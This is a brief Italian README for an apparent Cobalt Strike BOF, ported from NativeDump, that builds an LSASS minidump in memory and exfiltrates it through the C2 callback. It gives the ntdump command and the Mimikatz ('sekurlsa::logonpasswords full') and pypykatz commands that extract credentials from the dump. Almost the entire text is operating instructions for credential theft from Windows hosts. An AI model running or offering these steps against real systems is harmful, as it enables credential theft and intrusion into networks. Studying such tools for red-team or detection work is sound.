
Cobalt Strike BOF che crea un minidump di LSASS in memoria e lo esfiltra tramite il callback C2 per l'analisi offline delle credenziali con Mimikatz o pypykatz.
Porting BOF dello strumento https://github.com/ricardojoserf/NativeDump scritto da @ricardojoserf.
Importare NtDump.cna ed eseguire:
ntdump <filename>
Il file minidump verrà creato in memoria e scaricato utilizzando CALLBACK_FILE e CALLBACK_FILE_WRITE. Una volta scaricato, il file sarà visibile in View -> Download.
Questo può essere successivamente analizzato utilizzando Mimikatz
mimikatz # sekurlsa::minidump <file path to downloaded minidump file>
mimikatz # sekurlsa::logonpasswords full
Oppure pypykatz
pypykatz lsa minidump <file path to downloaded minidump file>